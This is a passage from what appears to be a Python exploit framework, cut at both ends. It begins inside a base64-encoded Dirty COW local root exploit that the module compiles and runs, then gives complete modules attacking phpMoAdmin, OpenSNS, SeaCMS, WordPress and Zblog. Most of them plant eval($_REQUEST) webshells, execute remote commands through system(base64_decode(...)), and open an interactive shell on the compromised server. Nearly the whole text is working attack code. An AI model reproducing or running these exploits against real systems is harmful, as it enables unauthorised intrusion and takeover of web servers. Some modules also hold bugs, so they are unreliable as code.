LFBST1RfUkVBRCxNQVBfUFJJVkFURSxmLDApOwoKICAgIHByaW50ZigiUmFjaW5nLCB0aGlzIG1h 88 | eSB0YWtlIGEgd2hpbGUuLlxuIik7CgogICAgcHRocmVhZF9jcmVhdGUoJnB0aDEsIE5VTEwsICZt 89 | YWR2aXNlVGhyZWFkLCBzdWlkX2JpbmFyeSk7CiAgICBwdGhyZWFkX2NyZWF0ZSgmcHRoMiwgTlVM 90 | TCwgJnByb2NzZWxmbWVtVGhyZWFkLCBwYXlsb2FkKTsKICAgIHB0aHJlYWRfY3JlYXRlKCZwdGgz 91 | LCBOVUxMLCAmd2FpdEZvcldyaXRlLCBOVUxMKTsKCiAgICBwdGhyZWFkX2pvaW4ocHRoMywgTlVM 92 | TCk7CgogICAgcmV0dXJuIDA7Cn0K 93 | ''' 94 | 95 | def __init__(self): 96 | pass 97 | 98 | def exploit(self): 99 | ''' 100 | 漏洞利用的核心代码, 在此函数中完成漏洞利用 101 | ''' 102 | Log.Log.info("Creating source code...") 103 | with open("/tmp/dirtyc0w.c", "w") as f: 104 | f.write(self.code.decode("base64")) 105 | Log.Log.info("Compiling...") 106 | os.system("gcc -o /tmp/dirtyc0w /tmp/dirtyc0w.c -pthread") 107 | Log.Log.info("Executing...") 108 | os.system("/tmp/dirtyc0w") 109 | Log.Log.info("Cleaning...") 110 | os.system("rm -rf /tmp/dirtyc0w") 111 | os.system("rm -rf /tmp/dirtyc0w.c") 112 | Log.Log.success("Exploit success!") 113 | 114 | def show_options(self): 115 | ''' 116 | 输出该模块的选项信息 (即之前定义的 config) 117 | 由 options 命令触发 118 | 通常不需要改动 119 | ''' 120 | if len(self.config.keys()) == 0: 121 | return 122 | Log.Log.warning("Options\t\tNecessity\t\tDefault") 123 | Log.Log.warning("-------\t\t---------\t\t-------") 124 | for key in sorted(self.config.keys()): 125 | Log.Log.warning("%s\t\t%s\t\t\t%s" % ( 126 | key, self.config[key]["necessity"], self.get_config(key))) 127 | 128 | def set_config(self, key, value): 129 | ''' 130 | 对模块的参数进行修改 131 | 由 set 命令触发 132 | 通常不需要改动 133 | ''' 134 | if key in self.config.keys(): 135 | self.config[key]["default"] = value 136 | else: 137 | Log.Log.error("No such option!") 138 | 139 | def get_config(self, key): 140 | return self.config[key]["default"] 141 | 142 | def show_info(self): 143 | ''' 144 | 模块(漏洞)的详细信息, 包括名称, 影响版本, 作者, 参考链接等等 145 | 该函数在模块被加载的时候自动调用 146 | 需要将其中的信息修改为对应的模块信息 147 | ''' 148 | Log.Log.info("Name: Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (SUID Method)") 149 | Log.Log.info("Effected Version: 2.6.22 < 3.9 (x86/x64)") 150 | Log.Log.info("Author: Robin Verton") 151 | Log.Log.info("Refer:") 152 | Log.Log.info("\thttps://www.exploit-db.com/exploits/40616/") 153 | 154 | def main(): 155 | ''' 156 | 测试用例 157 | ''' 158 | exploit = Exploit() 159 | exploit.show_info() 160 | exploit.show_options() 161 | exploit.exploit() 162 | 163 | if __name__ == "__main__": 164 | main() 165 | -------------------------------------------------------------------------------- /exploit/moadmin/cve_2015_2208.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | import requests 5 | 6 | try: 7 | from core.log import Log 8 | from core.log import color 9 | except Exception as e: 10 | import sys 11 | sys.path.append("../../core/log") 12 | from Log import Log 13 | from Log import color 14 | 15 | 16 | class Exploit: 17 | # 定义该漏洞利用的配置信息 18 | # 备注: 19 | # necessity 表示该参数是否必须配置 20 | # default 为该参数的默认值 21 | config = { 22 | "remote_host": {"default": "127.0.0.1", "necessity": True}, 23 | "remote_port": {"default": 80, "necessity": True}, 24 | "path": {"default": "/administrator", "necessity": True}, 25 | "command": {"default": "id", "necessity": True}, 26 | } 27 | session = requests.Session() 28 | 29 | def __init__(self): 30 | pass 31 | 32 | def exploit(self): 33 | ''' 34 | 漏洞利用的核心代码, 在此函数中完成漏洞利用 35 | ''' 36 | Log.Log.info("Lauching the exploition...") 37 | host = self.get_config("remote_host") 38 | port = int(self.get_config("remote_port")) 39 | path = self.get_config("path") 40 | command = self.get_config("command") 41 | url = "http://%s:%d/%s/moadmin.php?collection=1" % (host, port, path) 42 | data = { 43 | "object": "1;system(base64_decode('%s'));die();" % (command.encode("base64").replace("\n", "")) 44 | } 45 | Log.Log.info("Url: %s" % (url)) 46 | Log.Log.info("Data: %s" % (data)) 47 | try: 48 | response = requests.post(url, data=data) 49 | if response.status_code == 200: 50 | Log.Log.success("Exploit success!") 51 | print("%s" % (color.blue(response.content))) 52 | return True 53 | else: 54 | return False 55 | except Exception as e: 56 | Log.Log.error(str(e)) 57 | return False 58 | 59 | def show_options(self): 60 | ''' 61 | 输出该模块的选项信息 (即之前定义的 config) 62 | 由 options 命令触发 63 | 通常不需要改动 64 | ''' 65 | Log.Log.warning("Options\t\tNecessity\t\tDefault") 66 | Log.Log.warning("-------\t\t---------\t\t-------") 67 | for key in sorted(self.config.keys()): 68 | Log.Log.warning("%s\t\t%s\t\t\t%s" % ( 69 | key, self.config[key]["necessity"], self.get_config(key))) 70 | 71 | def set_config(self, key, value): 72 | ''' 73 | 对模块的参数进行修改 74 | 由 set 命令触发 75 | 通常不需要改动 76 | ''' 77 | if key in self.config.keys(): 78 | self.config[key]["default"] = value 79 | else: 80 | Log.Log.error("No such option!") 81 | 82 | def get_config(self, key): 83 | return self.config[key]["default"] 84 | 85 | def interactive(self): 86 | ''' 87 | 在成功拿到 WebShell 之后, 可以利用该函数获得一个伪终端 88 | 这里判断了 webshell_url 这个变量是否为空 89 | 因此, 在拿到 webshell 地址后, 需要将 webshell_url 进行设置 90 | ''' 91 | if self.webshell_url == "": 92 | Log.Log.error("Webshell is dead!") 93 | return 94 | while True: 95 | command = input("$ ") 96 | if command == "exit": 97 | break 98 | data = { 99 | self.get_config("shell_pwd"):"system(base64_decode('%s'));die();" % (command.encode("base64").replace("\n", "")) 100 | } 101 | print(data) 102 | try: 103 | Log.Log.success(self.session.post(self.webshell_url, data=data).content) 104 | except Exception as e: 105 | Log.Log.error(str(e)) 106 | return False 107 | 108 | def show_info(self): 109 | ''' 110 | 模块(漏洞)的详细信息, 包括名称, 影响版本, 作者, 参考链接等等 111 | 该函数在模块被加载的时候自动调用 112 | 需要将其中的信息修改为对应的模块信息 113 | ''' 114 | Log.Log.info("Name: phpMoAdmin (1.1.2) RCE (CVE-2015-2208)") 115 | Log.Log.info("Effected Version: <=1.1.2") 116 | Log.Log.info("Author: ") 117 | Log.Log.info("\tPichaya Morimoto pichaya") 118 | Log.Log.info("\tRicardo Jorge Borges de Almeida ") 119 | Log.Log.info("Refer:") 120 | Log.Log.info("\thttp://seclists.org/fulldisclosure/2015/Mar/19") 121 | Log.Log.info("\thttp://seclists.org/oss-sec/2015/q1/743") 122 | Log.Log.info("\thttps://www.exploit-db.com/exploits/36251/") 123 | Log.Log.info("\thttps://nvd.nist.gov/vuln/detail/CVE-2015-2208") 124 | 125 | def main(): 126 | ''' 127 | 测试用例 128 | ''' 129 | exploit = Exploit() 130 | exploit.show_info() 131 | exploit.set_config("remote_host", "192.168.187.1") 132 | exploit.show_options() 133 | exploit.exploit() 134 | 135 | if __name__ == "__main__": 136 | main() 137 | -------------------------------------------------------------------------------- /exploit/opensns/front_page_getshell.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | import requests 5 | import json 6 | 7 | try: 8 | from core.log import Log 9 | except Exception as e: 10 | import sys 11 | sys.path.append("../../core/log") 12 | from Log import Log 13 | 14 | class Exploit: 15 | config = { 16 | "remote_host": {"default": "127.0.0.1", "necessity":True}, 17 | "remote_port": {"default": 80, "necessity":True}, 18 | "shell_pwd": {"default": "c", "necessity":True}, 19 | "webshell": {"default": "", "necessity":True}, 20 | "interactive": {"default": True, "necessity":True} 21 | } 22 | webshell_url = "" 23 | 24 | def __init__(self): 25 | pass 26 | 27 | def exploit(self): 28 | remote_host = self.get_config("remote_host") 29 | remote_port = int(self.get_config("remote_port")) 30 | password = self.get_config("shell_pwd") 31 | webshell = self.get_config("webshell").replace("__PASSWORD__", password); 32 | url = "http://%s:%d/index.php?s=/Core/File/uploadPictureBase64.html" % (remote_host, remote_port) 33 | data = { 34 | 'data': 'data:image/php;base64,%s' % (webshell.encode("base64").replace("\n", "")) 35 | } 36 | Log.Log.info("Data: %s" % (data)) 37 | response = requests.post(url, data=data) 38 | content = response.content 39 | 40 | if content.startswith("{\"status\":") and content.endswith(".php\"}"): 41 | Log.Log.success("Exploit successfully!") 42 | Log.Log.success(success_json) 43 | success_json = json.loads(content) 44 | self.webshell_url = success_json['path'].replace("\\/", "/") 45 | if self.get_config(interactive) == True: 46 | self.interactive() 47 | return True 48 | Log.Log.error("Exploit failed!") 49 | return False 50 | 51 | def show_options(self): 52 | Log.Log.warning("Options\t\tNecessity\t\tDefault") 53 | Log.Log.warning("-------\t\t---------\t\t-------") 54 | for key in sorted(self.config.keys()): 55 | Log.Log.warning("%s\t\t%s\t\t\t%s" % (key, self.config[key]["necessity"], self.get_config(key))) 56 | 57 | def set_config(self, key, value): 58 | if key in self.config.keys(): 59 | self.config[key]["default"] = value 60 | else: 61 | Log.Log.error("No such option!") 62 | 63 | def get_config(self, key): 64 | return self.config[key]["default"] 65 | 66 | def show_info(self): 67 | Log.Log.info("Name: OpenSNS(3.3.1) UnAuthenticated GetShell") 68 | Log.Log.info("Effected Version: <=3.3.1") 69 | Log.Log.info("Author: Unknown") 70 | Log.Log.info("Email: Unknown") 71 | Log.Log.info("Refer:") 72 | Log.Log.info("\thttps://forum.90sec.org/forum.php?mod=viewthread&tid=10250") 73 | 74 | def interactive(self): 75 | if self.webshell_url == "": 76 | Log.Log.error("Webshell is dead!") 77 | return 78 | while True: 79 | command = input("$ ") 80 | if command == "exit": 81 | break 82 | data = { 83 | self.get_config("shell_pwd"):"system(base64_decode('%s'));" % (command.encode("base64").replace("\n", "")) 84 | } 85 | print(data) 86 | try: 87 | Log.Log.success(requests.post(self.webshell_url, data=data).content) 88 | except Exception as e: 89 | Log.Log.error(str(e)) 90 | return False 91 | 92 | 93 | def main(): 94 | exploit = Exploit() 95 | exploit.show_info() 96 | exploit.set_config("remote_host", "192.168.187.1") 97 | exploit.show_options() 98 | exploit.exploit() 99 | 100 | if __name__ == "__main__": 101 | main() 102 | -------------------------------------------------------------------------------- /exploit/seacms/cve_2017_17561.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | import requests 5 | 6 | try: 7 | from core.log import Log 8 | except Exception as e: 9 | import sys 10 | sys.path.append("../../core/log") 11 | from Log import Log 12 | 13 | class Exploit: 14 | config = { 15 | "remote_host": {"default": "127.0.0.1", "necessity":True}, 16 | "remote_port": {"default": 80, "necessity":True}, 17 | "admin_path": {"default": "admin", "necessity":True}, 18 | # "session_auth": {"default": True, "necessity":True}, 19 | "session_id": {"default": "", "necessity":True}, 20 | # "admin_user": {"default": "admin", "necessity":True}, 21 | # "admin_pwd": {"default": "admin", "necessity":True}, 22 | "webshell": {"default": "eval($_REQUEST[__PASSWORD__])", "necessity":True}, 23 | "shell_pwd":{"default": "c", "necessity":True}, 24 | "interactive":{"default":True, "necessity":True} 25 | } 26 | webshell_url = "" 27 | 28 | def __init__(self): 29 | pass 30 | 31 | def exploit(self): 32 | host = self.get_config("remote_host") 33 | port = int(self.get_config("remote_port")) 34 | admin_path = self.get_config("admin_path") 35 | # session_auth = self.get_config("session_auth") 36 | session_id = self.get_config("session_id") 37 | # username = self.get_config("username") 38 | # password = self.get_config("password") 39 | webshell_password = self.get_config("shell_pwd") 40 | webshell = self.get_config("webshell").replace("__PASSWORD__", webshell_password) 41 | url = "http://%s:%d/%s/admin_ping.php?action=set" % (host, port, admin_path) 42 | data = { 43 | "weburl":"www.seacms.net", 44 | "token":"123456789\";$var=%s.\"" % (webshell) 45 | } 46 | cookies = { 47 | "PHPSESSID":session_id 48 | } 49 | Log.Log.info("Data: %s" % (data)) 50 | Log.Log.info("Session: %s" % (cookies)) 51 | try: 52 | response = requests.post(url, data=data, cookies=cookies) 53 | self.webshell_url = "http://%s:%d/data/%s/ping.php" % (host, port, admin_path) 54 | if response.status_code == 200: 55 | Log.Log.success("Exploit success!") 56 | Log.Log.success("Webshell is stored at: %s" % (self.webshell_url)) 57 | Log.Log.success("Password is %s" % (webshell_password)) 58 | if self.get_config("interactive") == True: 59 | self.interactive() 60 | return True 61 | else: 62 | return False 63 | except Exception as e: 64 | Log.Log.error(str(e)) 65 | return False 66 | 67 | def show_options(self): 68 | Log.Log.warning("Options\t\tNecessity\t\tDefault") 69 | Log.Log.warning("-------\t\t---------\t\t-------") 70 | for key in sorted(self.config.keys()): 71 | Log.Log.warning("%s\t\t%s\t\t\t%s" % (key, self.config[key]["necessity"], self.get_config(key))) 72 | 73 | def set_config(self, key, value): 74 | if key in self.config.keys(): 75 | self.config[key]["default"] = value 76 | else: 77 | Log.Log.error("No such option!") 78 | 79 | def get_config(self, key): 80 | return self.config[key]["default"] 81 | 82 | def interactive(self): 83 | if self.webshell_url == "": 84 | Log.Log.error("Webshell is dead!") 85 | return 86 | while True: 87 | command = input("$ ") 88 | if command == "exit": 89 | break 90 | data = { 91 | self.get_config("shell_pwd"):"system(base64_decode('%s'));" % (command.encode("base64").replace("\n", "")) 92 | } 93 | print(data) 94 | try: 95 | Log.Log.success(requests.post(self.webshell_url, data=data).content) 96 | except Exception as e: 97 | Log.Log.error(str(e)) 98 | return False 99 | 100 | def show_info(self): 101 | Log.Log.info("Name: SeaCMS(6.56) Authenticated GetShell (CVE-2017-17561)") 102 | Log.Log.info("Effected Version: <=6.56") 103 | Log.Log.info("Author: WangYihang") 104 | Log.Log.info("Email: wangyihanger@gmail.com") 105 | Log.Log.info("Refer:") 106 | Log.Log.info("\thttps://gist.github.com/WangYihang/9507e2efdceb67a5bc2761200f19f213") 107 | Log.Log.info("\thttps://nvd.nist.gov/vuln/detail/CVE-2017-17561") 108 | 109 | def main(): 110 | exploit = Exploit() 111 | exploit.show_info() 112 | exploit.set_config("remote_host", "192.168.187.1") 113 | exploit.set_config("session_id", "b6aia8tltrqtie7h0pjojelml3") 114 | exploit.set_config("shell_pwd", "hacker") 115 | exploit.show_options() 116 | exploit.exploit() 117 | 118 | if __name__ == "__main__": 119 | main() 120 | -------------------------------------------------------------------------------- /exploit/seacms/seacms_v628_rce.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | import requests 5 | 6 | try: 7 | from core.log import Log 8 | from core.log import color 9 | except Exception as e: 10 | import sys 11 | sys.path.append("../../core/log") 12 | from Log import Log 13 | from Log import color 14 | 15 | 16 | class Exploit: 17 | # 定义该漏洞利用的配置信息 18 | # 备注: 19 | # necessity 表示该参数是否必须配置 20 | # default 为该参数的默认值 21 | config = { 22 | "remote_host": {"default": "127.0.0.1", "necessity": True}, 23 | "remote_port": {"default": 80, "necessity": True}, 24 | "webshell": {"default": "eval($_REQUEST[__PASSWORD__])", "necessity": True}, 25 | "webroot": {"default": "/var/www/html", "necessity": True}, 26 | "shell_path": {"default": "__WEBROOT__/version.php", "necessity": True}, 27 | "shell_pwd": {"default": "c", "necessity": True}, 28 | "interactive": {"default": True, "necessity": True} 29 | } 30 | # 如果该漏洞可以 GetShell, 该变量存储 shell 的 url 31 | webshell_url = "" 32 | session = requests.Session() 33 | 34 | def __init__(self): 35 | pass 36 | 37 | def exploit(self): 38 | ''' 39 | 漏洞利用的核心代码, 在此函数中完成漏洞利用 40 | ''' 41 | Log.Log.info("Lauching the exploition...") 42 | host = self.get_config("remote_host") 43 | port = int(self.get_config("remote_port")) 44 | abs_path = self.get_config("shell_path")[len("__WEBROOT__"):] 45 | webshell_path = self.get_config("shell_path").replace("__WEBROOT__", self.get_config("webroot")) 46 | webshell_password = self.get_config("shell_pwd") 47 | webshell = self.get_config("webshell").replace( 48 | "__PASSWORD__", webshell_password) 49 | url = "http://%s:%d/search.php?searchtype=5&tid=&area=eval($_POST[data])" % (host, port) 50 | data = { 51 | "data": "file_put_contents('%s', base64_decode('%s'));die();" % (webshell_path, webshell.encode("base64").replace("\n", "")) 52 | } 53 | Log.Log.info("Data: %s" % (data)) 54 | try: 55 | response = requests.post(url, data=data) 56 | self.webshell_url = "http://%s:%d/%s" % (host, port, abs_path) 57 | if response.status_code == 200: 58 | Log.Log.success("Exploit success!") 59 | Log.Log.success("Webshell is stored at: %s" % (self.webshell_url)) 60 | Log.Log.success("Password is %s" % (webshell_password)) 61 | if self.get_config("interactive") == True: 62 | self.interactive() 63 | return True 64 | else: 65 | Log.Log.error("Exploit failed!") 66 | print("%s" % (color.red(response.content))) 67 | return False 68 | except Exception as e: 69 | Log.Log.error(str(e)) 70 | return False 71 | 72 | def show_options(self): 73 | ''' 74 | 输出该模块的选项信息 (即之前定义的 config) 75 | 由 options 命令触发 76 | 通常不需要改动 77 | ''' 78 | Log.Log.warning("Options\t\tNecessity\t\tDefault") 79 | Log.Log.warning("-------\t\t---------\t\t-------") 80 | for key in sorted(self.config.keys()): 81 | Log.Log.warning("%s\t\t%s\t\t\t%s" % ( 82 | key, self.config[key]["necessity"], self.get_config(key))) 83 | 84 | def set_config(self, key, value): 85 | ''' 86 | 对模块的参数进行修改 87 | 由 set 命令触发 88 | 通常不需要改动 89 | ''' 90 | if key in self.config.keys(): 91 | self.config[key]["default"] = value 92 | Log.Log.success("%s\t==>\t%s" % (key, value)) 93 | else: 94 | Log.Log.error("No such option: %s" % (key)) 95 | 96 | def get_config(self, key): 97 | return self.config[key]["default"] 98 | 99 | def interactive(self): 100 | ''' 101 | 在成功拿到 WebShell 之后, 可以利用该函数获得一个伪终端 102 | 这里判断了 webshell_url 这个变量是否为空 103 | 因此, 在拿到 webshell 地址后, 需要将 webshell_url 进行设置 104 | ''' 105 | if self.webshell_url == "": 106 | Log.Log.error("Webshell is dead!") 107 | return 108 | while True: 109 | command = input("$ ") 110 | if command == "exit": 111 | break 112 | data = { 113 | self.get_config("shell_pwd"):"system(base64_decode('%s'));die();" % (command.encode("base64").replace("\n", "")) 114 | } 115 | print(data) 116 | try: 117 | Log.Log.success(self.session.post(self.webshell_url, data=data).content) 118 | except Exception as e: 119 | Log.Log.error(str(e)) 120 | return False 121 | 122 | def show_info(self): 123 | ''' 124 | 模块(漏洞)的详细信息, 包括名称, 影响版本, 作者, 参考链接等等 125 | 该函数在模块被加载的时候自动调用 126 | 需要将其中的信息修改为对应的模块信息 127 | ''' 128 | Log.Log.info("Name: SeaCMS(6.28) UnAuthenticated RCE") 129 | Log.Log.info("Effected Version: <=6.28") 130 | Log.Log.info("Author: 没穿底裤") 131 | Log.Log.info("Home: http://0day5.com/author/1/") 132 | Log.Log.info("Refer:") 133 | Log.Log.info("\thttp://0day5.com/archives/4180/") 134 | 135 | def main(): 136 | ''' 137 | 测试用例 138 | ''' 139 | exploit = Exploit() 140 | exploit.show_info() 141 | exploit.set_config("remote_host", "localhost") 142 | exploit.set_config("shell_pwd", "hacker") 143 | exploit.show_options() 144 | exploit.exploit() 145 | 146 | if __name__ == "__main__": 147 | main() 148 | -------------------------------------------------------------------------------- /exploit/wordpress/cve_2017_5487.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | import requests 5 | import json 6 | 7 | try: 8 | from core.log import Log 9 | from core.log import color 10 | except Exception as e: 11 | import sys 12 | sys.path.append("../../core/log") 13 | from Log import Log 14 | from Log import color 15 | 16 | 17 | class Exploit: 18 | # 定义该漏洞利用的配置信息 19 | # 备注: 20 | # necessity 表示该参数是否必须配置 21 | # default 为该参数的默认值 22 | config = { 23 | "remote_host": {"default": "127.0.0.1", "necessity": True}, 24 | "remote_port": {"default": 80, "necessity": True}, 25 | } 26 | session = requests.Session() 27 | 28 | def __init__(self): 29 | pass 30 | 31 | def exploit(self): 32 | ''' 33 | 漏洞利用的核心代码, 在此函数中完成漏洞利用 34 | ''' 35 | Log.Log.info("Lauching the exploition...") 36 | host = self.get_config("remote_host") 37 | port = int(self.get_config("remote_port")) 38 | url = "http://%s:%d/wp-json/wp/v2/users/" % (host, port) 39 | try: 40 | response = requests.get(url) 41 | if response.status_code == 200: 42 | Log.Log.success("Exploit success!") 43 | content = response.content 44 | print("%s" % (color.cyan("ID\tUser\t\tDescription"))) 45 | for user in json.loads(content)[::-1]: 46 | username = user["name"] 47 | if len(username) > 8: 48 | print("%s\t%s\t%s" % (user["id"], user["name"], user["description"])) 49 | else: 50 | print("%s\t%s\t\t%s" % (user["id"], user["name"], user["description"])) 51 | return True 52 | else: 53 | Log.Log.error("Exploit Failed!") 54 | return False 55 | except Exception as e: 56 | Log.Log.error(str(e)) 57 | return False 58 | 59 | def show_options(self): 60 | ''' 61 | 输出该模块的选项信息 (即之前定义的 config) 62 | 由 options 命令触发 63 | 通常不需要改动 64 | ''' 65 | Log.Log.warning("Options\t\tNecessity\t\tDefault") 66 | Log.Log.warning("-------\t\t---------\t\t-------") 67 | for key in sorted(self.config.keys()): 68 | Log.Log.warning("%s\t\t%s\t\t\t%s" % ( 69 | key, self.config[key]["necessity"], self.get_config(key))) 70 | 71 | def set_config(self, key, value): 72 | ''' 73 | 对模块的参数进行修改 74 | 由 set 命令触发 75 | 通常不需要改动 76 | ''' 77 | if key in self.config.keys(): 78 | self.config[key]["default"] = value 79 | else: 80 | Log.Log.error("No such option!") 81 | 82 | def get_config(self, key): 83 | return self.config[key]["default"] 84 | 85 | def interactive(self): 86 | ''' 87 | 在成功拿到 WebShell 之后, 可以利用该函数获得一个伪终端 88 | 这里判断了 webshell_url 这个变量是否为空 89 | 因此, 在拿到 webshell 地址后, 需要将 webshell_url 进行设置 90 | ''' 91 | if self.webshell_url == "": 92 | Log.Log.error("Webshell is dead!") 93 | return 94 | while True: 95 | command = input("$ ") 96 | if command == "exit": 97 | break 98 | data = { 99 | self.get_config("shell_pwd"):"system(base64_decode('%s'));die();" % (command.encode("base64").replace("\n", "")) 100 | } 101 | print(data) 102 | try: 103 | Log.Log.success(self.session.post(self.webshell_url, data=data).content) 104 | except Exception as e: 105 | Log.Log.error(str(e)) 106 | return False 107 | 108 | def show_info(self): 109 | ''' 110 | 模块(漏洞)的详细信息, 包括名称, 影响版本, 作者, 参考链接等等 111 | 该函数在模块被加载的时候自动调用 112 | 需要将其中的信息修改为对应的模块信息 113 | ''' 114 | Log.Log.info("Name: WordPress (<4.7.1) Username Enumeration (CVE-2017-5487)") 115 | Log.Log.info("Effected Version: <4.7.1") 116 | Log.Log.info("Author: Mateus a.k.a Dctor") 117 | Log.Log.info("FaceBook: https://fb.com/hatbashbr/") 118 | Log.Log.info("Email: dctoralves@protonmail.ch") 119 | Log.Log.info("Home: https://mateuslino.tk ") 120 | Log.Log.info("Refer:") 121 | Log.Log.info("\thttps://www.exploit-db.com/exploits/41497/") 122 | 123 | def main(): 124 | ''' 125 | 测试用例 126 | ''' 127 | exploit = Exploit() 128 | exploit.show_info() 129 | exploit.set_config("remote_host", "www.wopus.org") 130 | exploit.show_options() 131 | exploit.exploit() 132 | 133 | if __name__ == "__main__": 134 | main() 135 | -------------------------------------------------------------------------------- /exploit/zblog/zblog_authenticated_getshell.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | import requests 5 | import hashlib 6 | import sys 7 | import string 8 | 9 | try: 10 | from core.log import Log 11 | except Exception as e: 12 | import sys 13 | sys.path.append("../../core/log") 14 | from Log import Log 15 | 16 | def check_prefix(prefix): 17 | allow_chars = string.letters + string.digits 18 | if len(prefix) < 3: 19 | print("[-] The length of 'prefix' must > 3") 20 | return False 21 | for i in prefix: 22 | if i not in allow_chars: 23 | print("[-] The prefix must be [a-zA-Z0-9]") 24 | return False 25 | return True 26 | 27 | def md5(content): 28 | return hashlib.md5(content).hexdigest() 29 | 30 | class Exploit: 31 | # 定义该漏洞利用的配置信息 32 | # 备注: 33 | # necessity 表示该参数是否必须配置 34 | # default 为该参数的默认值 35 | config = { 36 | "remote_host": {"default": "127.0.0.1", "necessity": True}, 37 | "remote_port": {"default": 80, "necessity": True}, 38 | # "session_auth": {"default": True, "necessity":True}, 39 | # "session_id": {"default": "", "necessity": True}, 40 | "admin_user": {"default": "admin", "necessity":True}, 41 | "admin_pwd": {"default": "admin_zblog", "necessity":True}, 42 | "webshell": {"default": "eval($_REQUEST[__PASSWORD__])", "necessity": True}, 43 | "shell_pwd": {"default": "c", "necessity": True}, 44 | "interactive": {"default": True, "necessity": True}, 45 | "plug_prefix": {"default": "image", "necessity": True}, 46 | "shell_file": {"default": "update.php", "necessity": True} 47 | } 48 | # 如果该漏洞可以 GetShell, 该变量存储 shell 的 url 49 | webshell_url = "" 50 | session = requests.Session() 51 | 52 | def __init__(self): 53 | pass 54 | 55 | def login(self): 56 | remote_host = self.get_config("remote_host") 57 | remote_port = int(self.get_config("remote_port")) 58 | username = self.get_config("admin_user") 59 | password = self.get_config("admin_pwd") 60 | url = "http://%s:%d/zb_system/cmd.php?act=verify" % (remote_host, remote_port) 61 | data = { 62 | "username": username, 63 | "password": md5(password), 64 | } 65 | response = self.session.post(url, data=data) 66 | content = response.content 67 | return "后台首页" in content 68 | 69 | def exploit(self): 70 | ''' 71 | 漏洞利用的核心代码, 在此函数中完成漏洞利用 72 | ''' 73 | Log.Log.info("Lauching the exploition...") 74 | remote_host = self.get_config("remote_host") 75 | remote_port = self.get_config("remote_port") 76 | username = self.get_config("admin_user") 77 | password = self.get_config("admin_pwd") 78 | webshell_password = self.get_config("shell_pwd") 79 | prefix = self.get_config("plug_prefix") 80 | filename = self.get_config("shell_file") 81 | webshell = self.get_config("webshell") 82 | 83 | if not check_prefix(prefix): 84 | return False 85 | 86 | if not self.login(): 87 | Log.Log.error("Login failed!") 88 | Log.Log.error("Please check your username and password") 89 | return False 90 | Log.Log.success("[+] Login success!") 91 | 92 | Log.Log.info("[+] Sending payload...") 93 | try: 94 | url = "http://%s:%d/zb_users/plugin/AppCentre/plugin_edit.php" % (remote_host, remote_port) 95 | data = { 96 | "app_id": "%s'.%s.'" % (prefix, webshell.replace("__PASSWORD__", webshell_password)), 97 | "app_path": filename, 98 | } 99 | response = self.session.post(url, data=data) 100 | content = response.content 101 | except Exception as e: 102 | Log.Log.error(str(e)) 103 | return False 104 | 105 | if "已存在同名的APP应用" in content: 106 | Log.Log.error("PlugIn name has been used! Please change the prefix!") 107 | Log.Log.error("Exploit failed!") 108 | return False 109 | elif len(content) == 0: 110 | self.webshell_url = "http://%s:%d/zb_users/plugin/%s'.%s.'/%s" % (remote_host, remote_port, prefix, webshell.replace("__PASSWORD__", webshell_password), filename) 111 | Log.Log.success("Exploit success!") 112 | Log.Log.success("Enjoy your shell :") 113 | Log.Log.success("Url : %s" % (self.webshell_url)) 114 | Log.Log.success("Pas : c") 115 | Log.Log.success("Remember to die() it!") 116 | self.interactive() 117 | return True 118 | else: 119 | Log.Log.error("Unknown error!") 120 | Log.Log.error("Exploit failed!") 121 | return False 122 | 123 | def show_options(self): 124 | ''' 125 | 输出该模块的选项信息 (即之前定义的 config) 126 | 由 options 命令触发 127 | 通常不需要改动 128 | ''' 129 | Log.Log.warning("Options\t\tNecessity\t\tDefault") 130 | Log.Log.warning("-------\t\t---------\t\t-------") 131 | for key in sorted(self.config.keys()): 132 | Log.Log.warning("%s\t\t%s\t\t\t%s" % ( 133 | key, self.config[key]["necessity"], self.get_config(key))) 134 | 135 | def set_config(self, key, value): 136 | ''' 137 | 对模块的参数进行修改 138 | 由 set 命令触发 139 | 通常不需要改动 140 | ''' 141 | if key in self.config.keys(): 142 | self.config[key]["default"] = value 143 | else: 144 | Log.Log.error("No such option!") 145 | 146 | def get_config(self, key): 147 | return self.config[key]["default"] 148 | 149 | def interactive(self): 150 | ''' 151 | 在成功拿到 WebShell 之后, 可以利用该函数获得一个伪终端 152 | 这里判断了 webshell_url 这个变量是否为空 153 | 因此, 在拿到 webshell 地址后, 需要将 webshell_url 进行设置 154 | ''' 155 | if self.webshell_url == "": 156 | Log.Log.error("Webshell is dead!") 157 | return 158 | while True: 159 | command = input("$ ") 160 | if command == "exit": 161 | break 162 | data = { 163 | self.get_config("shell_pwd"):"system(base64_decode('%s'));die();" % (command.encode("base64").replace("\n", "")) 164 | } 165 | print(data) 166 | try: 167 | Log.Log.success(self.session.post(self.webshell_url, data=data).content) 168 | except Exception as e: 169 | Log.Log.error(str(e)) 170 | return False 171 | 172 | def show_info(self): 173 | ''' 174 | 模块(漏洞)的详细信息, 包括名称, 影响版本, 作者, 参考链接等等 175 | 该函数在模块被加载的时候自动调用 176 | 需要将其中的信息修改为对应的模块信息 177 | ''' 178 | Log.Log.info("Name: Zblog(1.5.1.1740) Authenticated GetShell") 179 | Log.Log.info("Effected Version: <=1.5.1.1740") 180 | Log.Log.info("Author: Shutdown_r") 181 | Log.Log.info("Home: http://www.jianshu.com/u/0876d51c215f") 182 | Log.Log.info("Refer:") 183 | Log.Log.info("\thttps://gist.github.com/WangYihang/318020687b7e5f1efb38e9afd40c941b") 184 | 185 | def main(): 186 | ''' 187 | 测试用例 188 | ''' 189 | exploit = Exploit() 190 | exploit.show_info() 191 | exploit.set_config("remote_host", "192.168.187.1") 192 | exploit.set_config("plug_prefix", "hack") 193 | exploit.show_options() 194 | exploit.exploit() 195 | 196 | if __name__ == "__main__": 197 | main() 198 | -------------------------------------------------------------------------------- /framework.py: -------------------------------------------------------------------------------- 1 | 